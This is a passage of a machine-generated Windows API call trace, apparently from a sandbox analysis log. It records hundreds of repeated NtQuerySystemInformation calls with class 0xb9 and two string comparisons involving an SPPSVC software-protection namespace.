NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0276.883] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0276.895] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0276.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.906] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0276.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd550, Length=0x28, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.910] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.911] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd470, Length=0x20, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd530, Length=0x20, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0276.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0276.916] NtQuerySystemInformation 